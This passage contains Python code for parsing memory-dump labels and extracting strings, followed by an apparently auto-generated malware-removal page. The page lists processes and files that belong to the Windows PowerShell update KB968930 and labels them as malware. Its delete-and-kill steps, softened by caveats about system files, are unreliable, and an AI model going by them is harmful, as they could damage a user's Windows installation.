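printable strings out of the dumped bytes, which is in essence how a list
like the one above is produced.  The label layout is inferred from the label
text itself, and SAMPLE_DUMP is constructed to imitate a dumped PE image; it
is not the memory of the analysed process."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class DumpRegion:
    image: str        # process image the region came from, e.g. regsvr32.exe
    pid: int          # process id it was dumped from
    protection: str   # page protection flags, e.g. rwx
    base: int         # virtual address of the first byte
    size: int         # length in bytes

    @property
    def end(self) -> int:
        return self.base + self.size

    def contains(self, va: int) -> bool:
        """True when virtual address va lies inside this region."""
        return self.base <= va < self.end


_LABEL = re.compile(
    r"^(?P<image>.+)_(?P<pid>\d+)_(?P<prot>[rwx-]{3})_"
    r"(?P<base>[0-9A-Fa-f]{8})_(?P<size>[0-9A-Fa-f]{8}):?$"
)


def parse_dump_label(label: str) -> DumpRegion:
    """Parse 'regsvr32.exe_928_rwx_01000000_00005000' into its fields.
    Base and size are hexadecimal: 00005000 is 20480 bytes, not 5000."""
    m = _LABEL.match(label.strip())
    if m is None:
        raise ValueError(f"unrecognised dump label: {label!r}")
    return DumpRegion(m["image"], int(m["pid"]), m["prot"],
                      int(m["base"], 16), int(m["size"], 16))


def ascii_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII at least min_len long, as strings(1) reports."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def utf16le_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable UTF-16LE text.  Windows keeps most resource and
    message strings in this form, so an ASCII-only scan silently misses them."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pat.finditer(data)]


def summarise(label: str, data: bytes) -> Dict[str, object]:
    """Parse the label, check the dump length against its size field and
    collect both string flavours."""
    region = parse_dump_label(label)
    return {
        "region": region,
        "length_matches_label": len(data) == region.size,
        "ascii": ascii_strings(data),
        "utf16": utf16le_strings(data),
    }


USAGE = "Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname"

# Constructed stand-in for a dumped image.  Each PE section header is 40
# bytes: an 8-byte name, 28 bytes of other fields and a 4-byte Characteristics
# value.  The .text header ends with 0x60000020 (little-endian 20 00 00 60),
# whose last byte 0x60 is the back-tick a strings scan glues onto "`.data".
SAMPLE_DUMP = (
    b"MZ" + b"\x00" * 6
    + b".text\x00\x00\x00" + b"\x00" * 28 + b"\x20\x00\x00\x60"
    + b".data\x00\x00\x00" + b"\x00" * 28 + b"\x40\x00\x00\xc0"
    + b".rsrc\x00\x00\x00" + b"\x00" * 28 + b"\x40\x00\x00\x40"
    + b"\x00\x00"
    + b"msvcrt.dll\x00ADVAPI32.dll\x00regsvr32.pdb\x00"
    + b"\x07\x1f"                                   # non-printable gap
    + USAGE.encode("utf-16-le") + b"\x00\x00"       # wide string, as in resources
    + b"PADDINGXXPADDING" * 2                        # linker padding text
)

if __name__ == "__main__":
    info = summarise("regsvr32.exe_928_rwx_01000000_00005000:", SAMPLE_DUMP)
    r = info["region"]
    print(f"{r.image} pid={r.pid} {r.protection} {r.base:#010x}-{r.end:#010x}")
    print("ascii :", info["ascii"])
    print("utf16 :", info["utf16"])
```

Run against a real dump file, the length check tells you whether the tool wrote the whole region or only its committed pages, and the UTF-16 pass is what surfaces the usage and error messages that regsvr32.exe stores as wide strings.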


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate the malicious process(es) with Task Manager. Caveat: most of the names below are Windows and .NET components that the KB968930 installer starts (ngen.exe, mscorsvw.exe, mofcomp.exe, regsvr32.exe, PSCustomSetupUtil.exe, PSSetupNativeUtils.exe, wsmanhttpconfig.exe) and that exit on their own when setup finishes; killing them mid-run leaves .NET native images and WMI/WinRM registration half done. Stop %original file name%.exe and the installer it launched (WindowsXP-KB968930-x86-ENG.exe, update.exe) first; the helpers are only worth ending if they are still running afterwards:

    mofcomp.exe:2768
    WindowsXP-KB968930-x86-ENG.exe:804
    ngen.exe:4084
    ngen.exe:3616
    ngen.exe:3712
    ngen.exe:3636
    ngen.exe:3672
    ngen.exe:252
    ngen.exe:3652
    ngen.exe:4092
    ngen.exe:3576
    ngen.exe:492
    ngen.exe:364
    ngen.exe:3628
    ngen.exe:3600
    ngen.exe:3660
    ngen.exe:3608
    ngen.exe:1796
    ngen.exe:3524
    ngen.exe:3644
    ngen.exe:3720
    ngen.exe:3704
    ngen.exe:3560
    ngen.exe:3680
    ngen.exe:3548
    %original file name%.exe:792
    update.exe:304
    mscorsvw.exe:3464
    mscorsvw.exe:3456
    mscorsvw.exe:3680
    mscorsvw.exe:3532
    mscorsvw.exe:2924
    mscorsvw.exe:2700
    mscorsvw.exe:2160
    mscorsvw.exe:2756
    mscorsvw.exe:3136
    mscorsvw.exe:3336
    mscorsvw.exe:3408
    mscorsvw.exe:280
    mscorsvw.exe:3816
    mscorsvw.exe:1112
    mscorsvw.exe:2940
    PSCustomSetupUtil.exe:3868
    PSCustomSetupUtil.exe:2844
    PSCustomSetupUtil.exe:2924
    PSCustomSetupUtil.exe:3140
    PSCustomSetupUtil.exe:3004
    PSCustomSetupUtil.exe:3060
    PSCustomSetupUtil.exe:3308
    PSCustomSetupUtil.exe:3736
    PSCustomSetupUtil.exe:3164
    PSCustomSetupUtil.exe:3232
    PSCustomSetupUtil.exe:3028
    PSCustomSetupUtil.exe:3104
    PSCustomSetupUtil.exe:3256
    PSCustomSetupUtil.exe:3892
    PSCustomSetupUtil.exe:3844
    PSCustomSetupUtil.exe:2872
    PSCustomSetupUtil.exe:3768
    PSCustomSetupUtil.exe:3936
    PSCustomSetupUtil.exe:3984
    PSCustomSetupUtil.exe:2972
    PSCustomSetupUtil.exe:3284
    PSCustomSetupUtil.exe:3788
    PSCustomSetupUtil.exe:2896
    PSCustomSetupUtil.exe:3192
    PSCustomSetupUtil.exe:3960
    PSCustomSetupUtil.exe:2792
    PSSetupNativeUtils.exe:2068
    regsvr32.exe:1976
    regsvr32.exe:780
    wsmanhttpconfig.exe:2740
    wsmanhttpconfig.exe:2668

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware. Caveat: this list mixes files the KB968930 installer dropped with existing Windows files it merely modified, and the latter must not be deleted. %System%\config\system and %System%\config\SYSTEM.LOG are the SYSTEM registry hive and its transaction log (Windows will not boot without them); %WinDir%\inf\oem10.inf, oem10.PNF and %System%\CatRoot2\dberr.txt belong to Setup's own bookkeeping; the %WinDir%\*.log files are optional-component setup logs worth keeping as evidence of what ran. The C:\ae90c0f98410dabe3b7635b5ceb43e\ tree is the installer's extraction directory and the SETxx.tmp entries are setup staging files, both safe to remove once setup has finished. The PowerShell and WinRM files under %System%\WindowsPowerShell\v1.0 and %System%\winrm are the installed product and should be removed with the update's own uninstaller, %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe, rather than by hand:

    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll (3118 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshmsg.dll (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.runtime.dll (33 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_automatic_variables.help.txt (14 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmpty.xsl (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_ise.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\eula.txt (586 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.dll (591 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll (1145 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_jobs.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\spuninst.exe (3787 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_do.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_troubleshooting.help.txt (146 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_ref.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\eventforwarding.adm (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_debuggers.help.txt (21 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\profile.ps1 (772 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_environment_variables.help.txt (417 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_operators.help.txt (770 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmanhttpconfig.exe (3009 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_profiles.help.txt (457 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (15909 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_aliases.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_wmi_cmdlets.help.txt (8 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\spupdsvc.exe (287 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\certificate.format.ps1xml (155 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssnapins.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_hash_tables.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_special_characters.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_faq.help.txt (775 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrs.exe (1154 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.exe (10748 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrshost.exe (22 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_switch.help.txt (489 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershellcore.format.ps1xml (1492 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmprovhost.exe (657 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.psd1 (950 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_continue.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_parameters.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.inf (2457 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.mof (789 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (512 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_comment_based_help.help.txt (595 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_wildcards.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_signing.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\updspapi.dll (5940 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssessions.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll-help.xml (16567 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_while.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_job_details.help.txt (824 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\dotnettypes.format.ps1xml (266 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmplpxy.dll (603 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_requires.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_objects.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_syntax.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.resources.dll (9 bytes)
    C:\$Directory (800 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll (5010 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_arrays.help.txt (8 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_for.help.txt (146 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.dll (1842 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_properties.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_join.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrscmd.dll (2907 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.resources.dll (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_internationalization.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_requirements.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.format.ps1xml (16 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_scripts.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_eventlogs.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_return.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_comparison_operators.help.txt (11 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_precedence.help.txt (8 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_locations.help.txt (794 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_modules.help.txt (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshplugin.dll (802 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pssetupnativeutils.exe (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_line_editing.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_methods.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssession_details.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_foreach.help.txt (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrssrv.dll (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremotemanagement.adm (574 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.ini (1956 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmtxt.xsl (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_parsing.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.exe (2526 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrsmgr.dll (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_try_catch_finally.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremoteshell.adm (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wtrinstaller.ico (4803 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_preference_variables.help.txt (37 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmwmipl.dll (2816 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_type_operators.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_format.ps1xml.help.txt (17 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_execution_policies.help.txt (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_trap.help.txt (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_break.help.txt (792 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_throw.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_providers.help.txt (59 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_prompts.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\getevent.types.ps1xml (15 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_assignment_operators.help.txt (379 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\importallmodules.psd1 (438 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_reserved_words.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\help.format.ps1xml (3947 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\$shtdwn$.req (788 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_path_syntax.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_quoting_rules.help.txt (659 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_types.ps1xml.help.txt (481 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pscustomsetuputil.exe (316 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmres.dll (6164 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_bits_cmdlets.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_if.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe.mui (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\windowspowershellhelp.chm (26041 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_logical_operators.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_regular_expressions.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_redirection.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_output.help.txt (887 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.resources.dll (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshsip.dll (24 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.dll (14450 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_arithmetic_operators.help.txt (168 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\spmsg.dll (495 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wevtfwd.dll (3351 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\diagnostics.format.ps1xml (590 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.mof (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.cmd (35 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_language_keywords.help.txt (11 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_split.help.txt (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\types.ps1xml (2510 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_scopes.help.txt (76 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_variables.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.vbs (2727 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_escape_characters.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_methods.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\registry.format.ps1xml (20 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions.help.txt (586 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.resources.dll (3153 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_commonparameters.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershelltrace.format.ps1xml (344 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_blocks.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_transactions.help.txt (1011 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pipelines.help.txt (411 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\default.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_history.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.ver (14 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\spcustom.dll (23 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pspluginwkr.dll (1756 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_jobs.help.txt (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_data_sections.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\filesystem.format.ps1xml (133 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_core_commands.help.txt (221 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_session_configurations.help.txt (276 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsman.format.ps1xml (837 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)
    %System%\SETBF.tmp (42 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %WinDir%\inf\oem10.PNF (10136 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %WinDir%\msmqinst.log (5648 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
